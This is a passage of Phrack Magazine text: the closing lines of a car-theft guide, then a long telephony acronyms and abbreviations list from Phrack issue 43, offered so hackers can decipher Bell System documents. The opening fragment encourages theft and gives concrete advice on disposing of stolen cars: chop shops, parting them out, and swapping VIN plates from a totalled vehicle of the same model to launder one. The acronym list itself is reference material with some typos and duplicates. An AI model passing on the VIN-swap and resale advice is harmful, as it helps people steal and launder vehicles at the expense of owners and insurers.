probably safely cruise around in it for a week or two. Go pick up bimbos and drive them to Las Vegas. Or sell the thing to a chop shop (you're on your own finding them; I have no experience with them). Tear it apart yourself and sell the parts. Drive it into the lobby of an insurance company building. Or go buy a Camaro of the same year and model that has been totalled out and switch the VIN plates once you have clear title. That's not a particularly difficult affair, although some skill is required to remove the VIN tags and install them in your new car. Have fun! Stay out of trouble. If you have any questions, E-mail me. Above all, keep in mind that two things are essential to steal a car without getting caught: PRACTICE and PREPARATION. Good luck! -->Spy Ace<-- spyace@mindvox.phantom.com ==Phrack Magazine== Volume Four, Issue Forty-Three, File 21 of 27 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + + + The Telephony Acronyms and Abbreviations List from Hell + + + + + + by + + Crisp GRASP + + + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Well, here it is, the list from hell. Sure beats the old lists of 100 or so three letter acronyms. The whole reason for this list is so that you can crack almost ANY bell document. This list came from a few lists (one in Phrack a while back) and a few other Telephony lists here and there. Though it must be noted (and i want to take credit for it) that well over half of the acronyms and abbreviations were typed in by me, inputed into my database (of course I am not about to give out my database). It is always a good idea to start a database, one will learn a lot faster. It is doing things scientific like, and for someone as compulsive as I, solving the puzzle of the telephone company was easy as pie. I must say that all the hackers I have meet, and talked to are all compulsive as hell . I think it is just what it comes down to, who is willing to learn. Any ways here is two fields in my database, one small part, but worth it. Though i do not think it will be able to help most of you out, just gets into too much, and understanding which acronym goes where, and understanding what goes where is hard. Well good luck! Greets to Bell Northern Labs, never see too much from you press wise! and to SRI, should have come to Cal. hah (Don knows what I am talking about, his funding is short) -------------------------------------------------------------------------- 15M Fifteen minutes 15S Fifteen seconds 1CF Singal party coing first pay phone 1FAC Interface packs 1FB One party flat business rate 1OF One party official (telco) business line 2SPDT Partial dial timeout in the second stage of a traditional 2-stage international 2SPST Permanent signal timeout in the second stage of a traditional 2-stage international 2SVCA Vacant code in the second stage of a traditional 2-stage international outbound 2W Two wire (pair) (circuit) 2WAY Two-way trunk groups 300 Log command menu (SARTS command) 376 Log clear (SARTS command) 384 Write log (SARTS command) 385 Read log (SARTS command) 399 Log print (SARTS command) 3KHZ Three kilohertz 3RNGR Three ringer 3WO Third wire open 4W Four wire (pair) (circuit) 600 Test menu (SARTS command) 600B 600-ohm briged connection 611 Detail tests (SARTS command) 621 Macro command menu (SARTS command) 631 Automatic test command (SARTS command) 735T 735-ohm compromise termination ?A Action field contains an error ?D Data field contains an error ?E Error exist in the message but can ot be resolved to the proper field ?I Identification field contains an error ?T Time-out has occured on channel ?W Warning message A A side (lead) (pair) A Area A Telephone number or trunk group and member number from trouble A/B Two wire phone connection (T&R) AA Automatic answer AA Packet analog access line INTER/TRA blocal 1-26 AABS Automatic alternate billing service AAE Auxiliary access equipment AAR Automatic alternate routing AAX Automated attendant exchange AB Packet switch trunk INTER/TRA blocal 1-26 ABATS Automatic bit access test system ABATS Automatic bit access test system (DDS service) ABC Automatic bill calling (TSPS) ABF Abandon failure ABF Abandon failure (MDII) ABHC Average busy hour calls ABL Auxiliary Buffer oder word Left half ABM Asynchronous balanced mode ( -> SABME) ABME ABM extended ABR Auxiliary Buffer order word Right half ABS Alternate billing service ABS Alternative billing service ABSBH Average busy season busy hour ABT Abort ABV Above AC Administrative computer AC Alternating current AC Assembly code ACA Asynchronous communication adapter ACB Annoyance call bureau ACB Automatic call-back ACC Audio communications controller ACCS Automated calling card service ACD Automatic call distribution ACD Automatic call distributor ACDA Automatic call disposition analyzer ACDN Access Directory Number ACDN Access directory number ACE Assignment change establish ACE Automatic calling equipment ACES Aris cabs entry system ACF Advanced communications functions ACFA Advanced CMOS frame aligner peb2030 ACG Automatic call gap ACH Attempt per circuit per hour ACI Answer controller interface (IOM2 monitor command) ACIA Asynchronous communications interface adapter ACK Acknowledge ACK No acknowledgement wink ACK No acknowledgement wink (MDII) ACKDB Acknowledgement database ACM Address complete msg. (SS7: in ISUP) ACOF Attendant control of facilities ACP Action point ACSE Association control service element ACSNET Acedemic computing services network ACSR Automatic customer station rearrangement ACSU Advanced T-1 channel service unit ACT AC Testing definition ACT AC testing definition ACT Activate ACT Active ACT Auto or automatic circuit transactions ACTS Automated coin toll service ACTV Acticated ACTVD Activated ACU Alarm control unit ACU Automatic calling unit AD Attendant INTER/TRA blocal 1-26 ADAP Audix data acquisition package ADAS Advanced directory assistance system ADC American digital cellular ADC Analog to digital converter ADCCP Advanced data communication controll procedure ADCCP Advanced data communications control procedure ADCI Automatic display call indicator ADD EXP Address expander ADDL Additional ADDR Address translations ADJ Ajust ADM Add-drop multiplex ADMA Advanced DMA controller SAB82258 ADN Abbreviated dialing number ADP Automatic diagnostic process. ADPCM Adaptive PCM ADS Administration of designed services ADS Administration of designed services review ADS Advanced digital system ADS Audio distribution system ADS Auxilary data system ADSL Asymmetrical digital subscriber line ADTS Automated digital terminal system ADTS Automatic data test system ADTS Automatic digital terminal system ADU Automatic dialing unit AERM Alignment error rate monitor AF Commercial audio fulltime INTER/TRA blocal 1-26 AFACTS Automatic facilities test system AFADS Automatic force adjustment data system AFE Analog front end AFI Authority and format identifier (ISO 7498) AFSC Advanced features service center AFSK Automatic frequency shift keying AG/EEE Above ground electronic equipment enclosures AGC Automatic gain control AGM Normal aging months AGND Analog ground AGT Accelerated aging type AI Activate indication (C/I channel code) AI Artificial intelligence AI Assigner's initials AI Automatic identified outward dialing INTER/TRA blocal 1-26 AIC Automatic intercept center AICC Automatic intercept communications controller AIN Advanced intelligent network AIOD Automatic id of outward dialing AIOD Automatic identifaction of outward dialing AIS Alarm indication signal AIS Alarm indication signals AIS Automatic intercept system AIT Analit initialization of tables AIU AI upstream AL Alternate services INTER/TRA blocal 1-26 ALATS Automatic loop access system system (DDS service) ALBO Automatic line buildout ALE Address latch enable ALE Automatic line evaluation ALFE Analog line front end ALGOL Algorhythmic computer language ALI Automatic location indentification ALIT Automatic line insulation testing ALL All events ALL All module controller maintenance interrupts ALL Turns on all IDs ALPT Alarm scan points ALRM Alarms ALRU Automatic line record update ALS Automated list service AM Administrative module AM Amplitude modulation AM Asynchronous multiplexer AM Packet AMA Automatic Message Accounting AMA Automatic message accounting AMACS AMA collection system AMAIRR Automatic message accounting irregularity AMALOST Lost automatic message accounting AMARC AMA recent change AMARC AMA recording center AMASE AMA standard entry AMAT Automatic message accounting transmitter AMATPS Automatic message accounting teleprocessing system AMATPS Automatic message accounting transmitter teleprocessing system AMC Add-on module connector (-> sipb) AMERITECH American information technologies AMI Alternate mark inversion code AML Automatic maintenance limit. AMP Advance measurement processor AMP Amplifier AMPS Advanced mobile phone service AMR Automatic meter reading AMWI Active message waiting indicator AN Announcement service INTER/TRA blocal 1-26 AN Associated number ANA Automatic number announcement ANC All number calling ANCT Analysis control table ANI Automatic number identification ANIF Automatic number identification failure ANM Answer msg. (SS7: in ISUP) ANS Answer ANS Answer On Bus ANS Answer msg. ANSER AT&T Network Servicing System (i.e. via EADAS link ) ANSI American national standards institute AO Allocation order AO International/overseas audio (full time) INTER/TRA blocal 1-26 AOC Advice of charge (i.256 B) AOSS Auxilliary operator service system AP Access point AP Application (OSI layer 7) AP Application processor AP Attached processor AP Auciliary processor AP Automatic position AP Commercial audio (part time) INTER/TRA blocal 1-26 AP-PG Access point page APC Alarm processor circuit APC Amarc protocol converter APD Access point data APD Avalanche photo diode APDB Access point data base APDL Application processor data link APH Application protocol handler API Application interface APM Application processor modules APPC Advanced program to program communication (IBM) APPL1-APPL5 Reserved for application handlers APS Automatic position system APS Automatic protection switch APS Automatic protection switching system AQ Autoquote problem. AR Activation request (C/I channel code) AR Alarm report AR01 Office alarm - 1AESS alarm message - AR02 Alarm retired or transferred - 1AESS alarm message - AR03 Fuse blown - 1AESS alarm message - AR04 Unknown alarm scan point activated - 1AESS alarm message - AR05 Commercial power failure - 1AESS alarm message - AR06 Switchroom alarm via alarm grid - 1AESS alarm message - AR07 Power plant alarm - 1AESS alarm message - AR08 Alarm circuit battery loss - 1AESS alarm message - AR09 AMA bus fuse blown - 1AESS alarm message - AR10 Alarm configuration has been changed (retired inhibited) - 1AESS AR11 Power converter trouble - 1AESS alarm message - AR13 Carrier group alarm - 1AESS alarm message - AR15 Hourly report on building and power alarms - 1AESS alarm message ARA Automatic reservation adjustment ARC Administrative responsibility code ARC Alternate route cancellation ARC Alternate route cancellation control ARC Audio response controller ARCOFI Audio ringing codec filter ARCOFI-SP ARCOFI + speakerphone function ARCOS ARCOFI coefficient support program ARCOTI SIPB telephone module ARD AR downstream ARG Alarm reference guide ARG Assemble and run a given master file ARIS Audichron recorded information system ARL Activation request local loop (C/I channel code) ARM Activation request maintenance (C/I channel code) ARM Asynchronous response mode ARM Automatic R(emote test system) maintance ARMAR Automatic request for manual assistance resolution ARN Activation request ARQ Automatic repeat request ARR Automatic ring recovery. ARS Alternate route selection ARS Automatic route selection ARSB Automated repair service bureau ARSB Automatic repair service bureau ARSSI Automatic rought selection screening index ART Audible ringing tone ARU Activation request upstream ARU Audio response unit ASAP As soon as possible ASC Alarm and status circuit ASC Alarm and status circuit . ASC Alarm surveillance and control ASCC2 Advanced serial communication controller ASCII American standard code for information interchange ASCII American standard code for information interexchange ASD Automated SMAS diagnostics ASDPE Synchronous data link controller (SDLC) A reset ASE Application service element ASEC Assignment section ASGN Assign ASGNMTS Assignments ASIC Application specific integrated circuit ASM Analog subscriber module ASOC Administrative service oversight center ASP Advanced service platform ASP Arcofi signal processor ASPACGCOMP ASP SCP response message with an ACG component received at the switch ASPBADRESP ASP SCP response message received with invalid data ASPEN Automatic system for performance evaluation of the network ASPNORTEMSG ASP reject message ret err and a play announc recei at the switch from the SCP ASPSNCOMP ASP SCP response message with a send notifi component received at the switch ASPTNMSG ASP termination notification message sent from the switch to the SCP ASR Access service request ASSN Assignment AST Position acknowledge seizure signal time-out (MDII) ASYNC Asynchronous AT Access tandem AT International/overseas audio (part time) INTER/TRA blocal 1-26 AT&T American telephone and telegraph AT-1 Auto test-1 AT-2 Auto test-2 AT01 Results of trunk test - 1AESS automatic trunk test ATA Automatic trunk analysis ATAB Area trunk assignment bureau ATAI Automatic troubler analysis interface ATB All Trunks Busy ATB All trunks busy ATC Automated testing control ATC Automatic transmission control ATD Accept date ATD Async. TDM ATH Abbreviated trouble history ATI Automatic test inhibit ATI Awake TI ATICS Automated toll integrity checking system ATIS Automatic transmitter identification system ATM Analog trunk module ATM Asynchronous transfer mode ATM Automatic teller machine ATMS Automated trunk measurement system ATN Assigner's telephone number ATO Time-out waiting for address complete signal ATP All tests pass ATR Alternate trunk routing ATRS Automated trouble reporting system ATTC Automatic transmission test and control circuit ATTCOM AT&T communications ATTG Attendant group ATTIS AT&T information system AU Access unit AU Autoscript INTER/TRA blocal 1-26 AU Auxiliary AUD Assignment list audit AUD Audits AUDIT Audit detected problem. AUDIX Audio information exchange AUP Access unit port AUTO Automaitc AUTODIN Automatic digital network AUTOSEVCOM Automatic secure voice communications AUTOVON Automatic voice network AUXF Auxillary frame AVD Alternate voice data AVD Alternate voice-data AWI Awake indication AZD All zeros data B B side (pair) (lead) B Bridged connection B Equipment number B6ZS Bipolar with 6 zero subsitution B8ZS Bipolar eight zero suppression encoding (DS-1) B8ZS Bipolar with 8 zeros substitution (T1 pri) B911 Basic 911 BA Basic access BA Protective alarm (CD) INTER/TRA blocal 1-26 BAF Blocking acknowledgment failure BAI Bridge lifter assignment inquiry BAL Balance BAMAF Bellcore AMA format BANCS Bell administrative network communications system BANKS Bell adminastration network systems BAPCO Bellsouth advertising & publishing company BAS Basic activity subset BAT Battery (-48v) BAx Business address x (x = number of line) BB Blue box BBD0/1 Binary 0s or 1s detected in b and d channels BCC Bellcore client companies BCC Block check character BCC Blocked call cleared BCCP Bearer ccp BCD Binary coded decimal BCD Blocked call delayed BCFE Busy call forwarding extened BCID Business customer identifier BCLID Bulk calling line identification BCMS Basic call management system BCS Batch change supplement (NTI) (DMS-100) BDCA Unk BDCS Broadband digital cross-connect system BDS Basic data service BDT Billing data transmitter BEF Band elimination filter BEL Bell BELLCORE Bell communications research BER Bit error rate BERT Bit error rate test BETRS Basic exchange telecommunications radio service BG Battery and ground signaling BG/EEE Below ground electronic equipment enclosures BHC Busy hour call BHC Busy hour calls BIB Backward indicator bit (SS7) BICU Bus interface control unit BIFIFO Bidirectional fifo BIR Bit receiver BIR Bus interface register BISDN Broadband ISDN BISP Business information system program BISYNC Binary synchronous communications BIT Bit BIT Bit transmitter BITNET Because-it's-time network BITR Bit transceiver BIX Building internal cross-connects BK Back BKUP Backup BKUP Requests a backup BL Bell & lights INTER/TRA blocal 1-26 BL Bridge lifter BL Bridge lifters - COSMOS command BL/DS Busy line/don't answer BLA Blocking acknowledgement (SS7: in ISUP) BLF Busy line field BLFCA Blocking a fully coded addressed international outbound call routed to a non-common channel signaling trunk BLK Block BLKD Blocked BLO Blocking (SS7: in ISUP) BLS Bridge lifter status BLS Business listing service BLV Busy line verification BMC Billing media coverage BMD Batch mode display BMI Batch mode input - TIMEREL and DEMAND BMOSS Building maintance operations service system BMR Batch mode release BMU Basic measurement unit (dip) BND Band number BNS Billed number screening BNSDBOV BVA BNS message received indicating data base overload BNSDBUN BVA BNS message returned because data base unable to process BNSGMSG BVA BNS message received garbled BNSNBLK BVA BNS message returned because of network blockage BNSNCON BVA BNS message returned because of network congestion BNSNRTE BVA BNS message returned because of no routing data BNSTOUT BVA BNS message returned because of timeout BNSUNEQ BVA BNS message returned because of unequipped destination BNSURPY BVA BNS message received with an unexpected reply BNx Business name x (x = number of line) BOC Bell operating companies BOC Bell operating company BOCC Building operations control center BOP Byte oriented protocol BOR Basic output report BORSCHT Battery BOS Bit oriented signaling BOS Business office supervisor BOSS Billing and order support system BOSS Business office service system (NYNEX) BOT Beginning of tape BOT Bottom BPI Bits per inch BPOC Bell point of contact BPS Bits per second BPSK Binary psk BPSS Basic packet-switching service BPUMP Backup pump BR Bit robbing (CAS-BR) BRAT Business residence account tracking system BRCF Business and residential customer service feature BRCS Business and residential customer services BRCS Business residence custom service BRDCST Broadcase BRDG Bridge BRDGD Bridged BREVC Brevity control BRG Baud rate generator BRI Basic rate interface BRITE Basic rate interface transmission extension (5ESS) BRK Break BRM Basic remote module BRM Bell communications research practice BRST Bridge signature table BS Backspace BS Banded signaling BS Bias battery (-19.1v) BS Siren control INTER/TRA blocal 1-26 BSA Basic serving arrangements BSBH Busy season busy hour BSC Business service center BSC/RSC Business/residence service center BSCM Bisynchronous communications module BSDPE SDLC B reset BSE Basic service elements BSF Bell shock force BSI British standards institution BSN Backward sequence number (SS7) BSOC Bell systems operating company BSP Bell system practice BSRF Basic standard reference frequency BSRFS Bell system reference frequency standard BST Basic services terminal BSTJ Bell system technical journal BT British telecom BTAM Basic telecommunications access message BTH Both BTL Bell telephone laboratories BTN Billing telephone number BTSR Bootstrapper board BTU British thermal unit BUFF System buffers (NTI) BVA Billing validation application BVAPP Billing verification and authorization for payment process BVC Billing validation center BVS Basic voice service BWM Broadcast warning message BWT Broadcast warning twx BWTS Bandwidth test set BYF Display the bypass file BYP Change the contents of the bypass file C Counting rate C Current supervision C Scan point (SP) C&A Centrifugal and absorption C-ACD Commercial-automatic call distributor (OSPS) C-NCH C-notch C/I Command/indicate C/S UNIT Combiner and splitter C1 Circuit system CA Cable CA Cable number CA Collision avoidance CA SSN access INTER/TRA blocal 1-26 CABS Carrier access billing system CAC Calling-card authorization center CAC Carrier access code CAC Circuit administration center CAC Customer administration center CACHE Cache errors CAD Computer-aided dispatch CAD Critical alarm display CADN Circuit administration. CADV Combined alternate data/voice CAF Circuit reset acknowledgment failure CAFD Comptrollers' automatic message accounting format description CAFD Controllers automatic message accounting format description CAI Address incomplete received CAI Call assembly index CAIS Colocated automatic intercept system CALRS Centralized automatic loop reporting system CAM Communication access method CAM Computer aided manufacturing CAM Content adressable memory CAM Control administration module CAMA Central automatic message accounting. CAMA Centralized auto message accounting CAMA Centralized automatic message accounting CAN Cancel CANC Cancel (i.451) CANF Clear the cancel from CANT Clear the cancel to CAP Capacitance CARL Computerized administrative route layout CAROT Centralized automatic reporting on trunks CAROT Centralized automatic reporting on trunks. CAS Cannel associated signaling CAS Circuit associated signaling CAS Computerized autodial system CAS Craft access system (SARTS) CAS Customer account service CAS7ABM CAS common channel signaling 7 (CCS7) abort message received CAS7ACG CAS CCS7 ACG invoke component received CAS7GMG CAS CCS7 received with invalid format reply CAS7GWE CAS CCS7 error CAS7NCG CAS CCS7 message returned because of network congestion CAS7NFL CAS CCS7 message returned because of network failure CAS7RCR CAS CCS7 reject component received CAS7SCG CAS CCS7 message returned because of subsystem congestion CAS7SFL CAS CCS7 message returned because of subsystem failure CAS7TAN CAS CCS7 message returned CAS7TOT CAS CCS7 query which timed out before reply received CASDBOV CAS message received indicating data base overload CASDBOV Customer account services (CAS) message received indicating data base overload CASDBOV Customer account services (CAS) message received indicating database overload CASDBUN CAS message returned CASGMSG CAS message received garbled CASNBLK CAS message returned because of network blockage CASNCON CAS message returned because of network congestion CASNRTE CAS message returned because of no routing data CASTOUT CAS message returned because of timeout CASUNEQ CAS message returned because of unequipped destination CASURPY CAS message received with an unexpected reply CAT Centrex access treatment CAT Craft access terminal CATLAS Centralized automatic trouble locating and analysis system CAY Create an assembly CB OCC audio facilitys INTER/TRA blocal 1-26 CBA Change back acknowledgement (SS7: in mtp) CBD Change back declaration (SS7: in mtp) CBEMA Computer and business equipment manufacturers' assc. CBERR Correctable bit error CBS Crossbar switching CBX Computerized branch exchange CC Call count CC Central control CC Central controller CC Common channel (CAS-CC) CC Common control CC Connection confirm CC Country code CC Country code (ISO 7498) CC Initials of person closing report out to catlas. CC OCC digital facility-medium speed INTER/TRA blocal 1-26 CC1 Call control 1 (IOS) CCA Change customer attributes CCA Computer content architecture (ISO 8637/2) CCBS Completion of call to busy subscribers (i.253 c) CCC Centeral control complex CCC Central control complex CCC Clear channel capability CCC Computer control center CCD Change due date - COSMOS command CCDDBOV BVA calling card (CCRD) message received indicating data base overload CCDDBUN BVA CCRD message returned because data base unable to process CCDGMSG BVA CCRD message received garbled CCDNBLK BVA CCRD message returned because of network blockage CCDNCON BVA CCRD message returned because of network congestion CCDNRTE BVA CCRD message returned because of no routing data CCDR Calling card CCDTOUT BVA CCRD message returned because of timeout CCDUNEQ BVA CCRD message returned because of unequipped destination CCDURPY BVA CCRD message received with an unexpected reply CCF Custom calling features CCH Connections per circuit per hour CCIR Comite' consultatif international des radio communications CCIR Consultative committee for radiocomunication (international radio CCIS Common channel interoffice signaling CCITT Comite' consultatif international telegraphique et telephonique CCITT Consultative committee for internat. telephone and telegraph CCM Customer control management CCNC CCS network control CCNC Common channel network controller CCNC Computer/communications network center CCOA Cabinet control and office alarm CCP Call control part CCR Clock configuration register CCR Continuity check request (SS7: in ISUP) CCR Customer-controlled reconfiguration CCRC Corrupt crc (IOM2 monitor command) CCRD Calling card (5E) CCRS Centrex customers ... system CCS Centum Call Seconds CCS Cluster support system CCS Common channel signaling CCS Custom calling services (NTI) CCS Hundred (C) call seconds CCS Hundred call seconds CCSA Common control switching arrangement CCT Central control terminal CCT Initialize and update the contractor-transducer file CCTAC Computer communications trouble analysis center CCU Colt computer unit CCU Combined channel units CCU Communication control unit CCV Calling card validation CD Call deflection (i.252 e) CD Collision detection (->csma/) CDA Call data accumulator CDA Change distribution attributes CDA Coin detection and announcement CDACS Concentrating DACS CDAR Customer dialed account recording CDC Central distrubtion center CDCF Cumulative discounted cash flow CDD Change due date CDF Combined distributing frame CDF DTF coin CDFI Communication link digital facilities interface CDI Circle digit identification CDI Connected line identification (i.251 C/E) CDI Control and data interface. CDI Control data interface CDIG Circle digit translation (NTI) CDM Coax data module CDMA Code division ma CDO Community dial office CDPR Customer dial pulse receiver CDQ1 Custom calling services discount quote CDR Call detail record CDR Call dial rerouting CDR Collision detect input line CDR Cut thru dip report CDRR Call detail recording and reporting CDS Circuit design system CDS Codes CDS Craft dispatch system CE Collision elimination (->CSMA/) CE Common equipment data (NTI) CE Conducted emission (EME) CE SSN station line INTER/TRA blocal 1-26 CEF Cable entrance facility CEI Comparable efficient interconnection CEI Comparably efficient interconnection CEN European committee of standards CENELEC European committee of standards (electrotechnics) CEP Connection endpoint CEPT European conference of post/telecom administrations CES CC error summary CEU CCS estimated usage CEV Control environmental vault CEV Controlled environment vault CF Coin first CF OCC special facility INTER/TRA blocal 1-26 CFA Carrir failure alarms CFA Change facility attributes CFC Cost function code CFCA Communications fraud control association CFD Coinless ANI7 charge-a-call CFGN Configuration CFI Configurable interface (SIPB) CFINIT Custom calling feature table CFN Call forward number CFND Call forward number don't answer CFNR Call forwarding no reply (i.252 c) CFP Call forwarding busy (i.252 b) CFP Print the class of service/features for an electromechanical enti CFR Code of federal regulations CFT Craft CFU Call forwarding unconditional (i.252 d) CFU Change facility usage CG Control group number CG OCC telegraph facility INTER/TRA blocal 1-26 CG01 Carrier group in alarm - 1AESS carrier group CG03 Reason for above - 1AESS carrier group CGA Carrier group alarm CGA Carrier group assignment CGAP Call gapping CGAP Call gapping code controls messages. CGB Circuit group blocking (SS7: in ISUP) CGBA CGB acknowledgement CGM Computer graphics metafile (ISO DIS 8632) CGN Concentrator group number CGNC Connector group network controller CGU Circuit group unblocking (SS7: in ISUP) CGUA CGU acknowledgement CH Change CH OCC digital facility high-speed INTER/TRA blocal 1-26 CHAN Channel CHAPS UNK - a known AT&T System - def. unknown CHAR Character CHG LASG Change loop assignment CHK Check CHR Chronical CI Concentrator identifier trunk INTER/TRA blocal 1-26 CI0IN Control interface 0 interrupt CI1IN Control interface 1 interrupt CIB Centralized intercept bureau CIC Carrier identification codes CIC Circuit identification code CIC Customer Information Center (AT&T) CICS Customer information control system CID Connection identification CIE Company establish company initiated change CIF Common intermediate format (for ISDN high end video) CIH Craft interface handler CII Call identity index CII Initial address message (IAM) irregularity (incoming) CIMAP Circuit installation and maintance assistance program CIMAP/CC Circuit installation and maintenance assistance/control center CIP Control interface port CIRR C/I receive register CIS Crimeline information systems CIS Customized intercept service CIXR C/I transmit register CJ OCC control facility INTER/TRA blocal 1-26 CK Checkbits CK OCC overseas connecting facility wide-band INTER/TRA blocal 1-26 CKF Continuity check failure (incoming) CKID Circuit identification CKL Circuit location CKS Clock select bit CKT Circuit CKT Circuit. CKTRY Cuicuitry CL Centrex CO line INTER/TRA blocal 1-26 CLASS Centralized local area selective signaling CLASS Custom local area signaling service CLC Common language code for an entity CLCI Common language circuit identification CLCT Network management control counts CLDIR Call direction CLDN Calling line directory number CLEI Common language equipment identifier CLF Creating dips upper bound load factor CLFI Common lang facilities identication CLI COSMOS processed alit reports CLI Calling line ident CLID Calling line identification CLIP Calling line identification presentation (i.251 c) CLIR Calling line identification restriction (i.251 d) CLK Clock CLL Creating dips lower bound load factor CLLI Common-language location identification CLNK Communication link CLNKs Communication links CLNORM Communication link normalization CLR Circuit layout record CLR Clear CLRC Circuit layout record card CLS CLCI in serial number format CLS Connectless-mode service CLSD Closed CLSV Class of service CLT CLCI telephone number format CLT Communications line terminal CLUS Cluster data (NTI) CM C-message frequency weighting CM Communication module CM Connection memory CM OCC video facility INTER/TRA blocal 1-26 CMAC Centralized maintenance and administration center CMAP Centralized maintance and administration position CMC Call modification completed (SS7: in ISUP) CMC Cellular mobile carrier CMC Cellular modile carrier CMC Construction maintenance center CMD Command CMDF Combined main distributing frame CMDS Centralized message data system CMF Capacity main station fill CMP Communication module processor CMP Communications module processor CMP Companion board CMP Corrective maintenancean practices CMPR Compares CMR Call modification request (SS7: in ISUP) CMR Cellular mobile radio CMRJ CMR reject (SS7: in ISUP) CMS Call management system CMS Circuit maintance system CMS Circuit maintance system 1C CMS Circuit maintenance system CMS Communications management subsystem CMS Conversational monitoring system CMT Cellular mobile telephone CMT Combined miscellaneous trunk frame CMU CCS measured usage CMU Colt measurement unit CN C-notch frequancy weighting CN Change notice CN Changel noticee CN Connection CN SSN network trunk INTER/TRA blocal 1-26 CN/A Customer name/address CN02 List of pay phones with coin disposal problems - 1AESS coin phone CN03 Possible trouble - 1AESS coin phone CN04 Phone taken out of restored service because of possible coin fraud CNA Communications network application CNAB Customer name/address bureau CNCC Customer network control center CNI Common network interface CNMS Cylink network management system CNS Complimentary network service CNS Concentrating network system CNT Count CNTS Counts CNVT Converted CO Central office CO Continuous (SARTS) CO OCC overseas connecting facility INTER/TRA blocal 1-26 CO UN Central office unit code COA Change over acknowledgement (SS7 in MTE) COAM Centralized operation COAM Customer owned and maintained COC Circuit order control COCOT Customer-owned coin-operated telephone COD Code CODCF Central office data connecting facility CODEC Coder/decoder COE Central office entity COE Central office equipment COEES COE engineering system COEES Central office equipment engineering system COER Central office equipment record COEST Central office equipment signature table COF Confusion received (outgoing) COFA Change of frame alignment (DS-1) COG Centralized operations group COGRDG Central office grounding COLP Connected line identification presentation COLR Connected line identification restriction COLT Central office limit table COLT Central office line tester COM Common controller COM Communication COM Complement size COM Computer output microfilm COM/EXP PCM-compander/expander COMM Comunication COMMS Central office maintenance management system COMMS-PM Central office maintenance management system-preventive Maintenance COMP Computed COMPNY Company COMPS Central Office Managenment Program (GTE) COMSAT Communications satellite CON Concentrator - COSMOS command COND Conditions CONF Conference calling (i.254 a) CONFIG Configutation CONN Connect msg. (i.451) CONN Connector CONN Nailed-up connections CONT Control CONTAC Central office network access CONUS Continental united states COO Change over order (SS7: in MTP) COP Call offering procedure COPY Data copied from one address to another - 1AESS copy CORC Commands and responses definition and compressing program (IOS) CORC Customer riginated recent change CORCs Customer-originated recent changes CORNET Corperate network COS Connection-mode service COSIB Central office platform operator service interface board COSMIC Common systems main interconnection frame system (frame) COSMOS Computer system for mainframe operations COT Centeral office terminal COT Central office technician COT Central office terminal COT Central office terminal (opposite to RT) COT Continuity (SS7: in ISUP) COTM Central office overload call timing (NTI) CP Cable pair CP Call processing parameters (NTI) CP Communication processor (SARTS) CP Concentrator identifier signaling link INTER/TRA blocal 1-26 CP Control program CPA Centralized/bulk power architecture CPC Cellular phone company CPC Circuit provision center CPC Circuit provisioning center CPC Circuit provisioning center (special services design group) CPCE Common peripheral controller equipment CPD Central pulse distributor CPD Common packet data channels CPE Customer premise equipment CPE Customer premises equipment CPG Call progress (SS7: in ISUP) CPH Cost per hour CPI COSMOS-premis interface CPI Computer private branch exchange interface CPIE CP or AM intervention interrupt error CPM COSMOS performance monitor CPM Citcuit pack module CPM Cost per minute CPMP Carrier performance measurement plan CPS Cycles per second CPU CCS capacity usage CPU Call pick up CPU Call pickup group CPU Central processing unit CQM Circuit group query (SS7: in ISUP) CQR CQM response CR Carriage return CR Control Record CR Control response CR OCC backup facility INTER/TRA blocal 1-26 CRAS Cable repair administrative system CRC Customer record center CRC Cyclic redundancy check CRCOK CRC ok! (C/I channel code) CRE Create CRED Credit card calling (i.256 a) CREF Connection refused CREG Concentrated range extension with gain CRF Continuity recheck failure (outgoing) CRFMP Cable repair force management plan CRG Creg tag CRIS Customer records information system CROT Centralized automatic reporting of trunks (NTI) CRR Reset received (incoming) CRS Centralized results system CRSAB Centralized repair service answering bureau CRST Specific carrier restricted CRT Cathode ray tube CRT Cathode-ray tube CRTM Central office regular call processing timing (NTI) CS Cable switching CS Call Store CS Channel service INTER/TRA blocal 1-26 CS Conducted susceptibility (EMS) CS Customer class of service CSA Carrier serving area CSACC Customer service administration control center CSAR Centralized system for analysis and reporting CSAR Centralized system for analysis reporting CSC Cell site controller CSD Circuit specific data CSDC Circuit switched digital capability CSDN Circuit-switched data network (t.70) CSF Critical short form CSMA/ Carrier sense multiple access CSMCC Complex services maintenance control center CSNET Computer science network CSO Central services organization CSO Cold start only (in eoc) CSP Coin sent paid CSP Coin set paid CSPDN Circuit-switched public data network CSR Clock shift register CSR Customer service records CSS Computer sub-system CSS Computer subsystem CSS Customer service system CSSC Customer service system center CST Call state or current state or change state (QUASI SDL) CST Combined services terminal CSU Channel service unit CSUS Centralized automatic message accounting suspension (NTI) CT Call transfer (i.252 a) CT Control terminal CT SSN tie trunk INTER/TRA blocal 1-26 CT01 Manually requested trace line to line information follows - 1AESS CT02 Manually requested trace line to trunk information follows - 1AESS CT03 Intraoffice call placed to a number with CLID - 1AESS call trace CT04 Interoffice call placed to a number with CLID - 1AESS call trace CT05 Call placed to number on the ci list - 1AESS call trace CT06 Contents of the CI list - 1AESS call trace CT07 ACD related trace - 1AESS call trace CTC Central test center CTC Centralized test center (DDS) CTC Centralized testing center CTC Complete a cable transfer or complete a cable throw CTD Circuit test data CTE Cable throw order establishment CTF Display the contacter-transducer file CTI Circuit termination identification CTL Cable throw with line equipment assignment CTL Central operator control CTM Cable throw modification CTM Contac trunk module CTMC Communications terminal module controller CTMS Carrier transmission measuring system CTO Call transfer outside CTO Continuity timeout (incoming) CTP Print cable transfer frame work CTR Cable throw replacement CTS Cable throw summary CTS Call through simulator CTS Clear to send CTSS Cray time sharing system CTT Cartridge tape transport CTT Cut through tag CTTC Cartridge tape transport controller CTTN Cable trunk ticket number CTTU Central trunk testing unit. CTU Channel test unit CTW Withdraw a cable transfer or a cable throw CTX Centrex group number CTX Various centrix verifies CU Channel unit CU Channel unit CU Control unit CU Customer unit CU/EQ Common update/equipment system CU/TK Common update/trunking system CUCRIT Capital utilization criteria CUG Closed user group (i.255 a) CUP Common update processor CUSTAT Control unit hardware status CUT Circuit under test CUTOVER Cutover (pre-cut) inactive state. CV OCC voice grade facility INTER/TRA blocal 1-26 CVN Vacant national number received (outgoing) CVR Compass voice response CW Call waiting (i.253 a) CW OCC wire pair facility INTER/TRA blocal 1-26 CWC City-wide centrex CWD Call waiting deluxe CXC Complex service order input checker CXM Centrex table management CXT Complex order inquiry for nac review CZ OCC access facility INTER/TRA blocal 1-26 CorNet Corporate network protocol 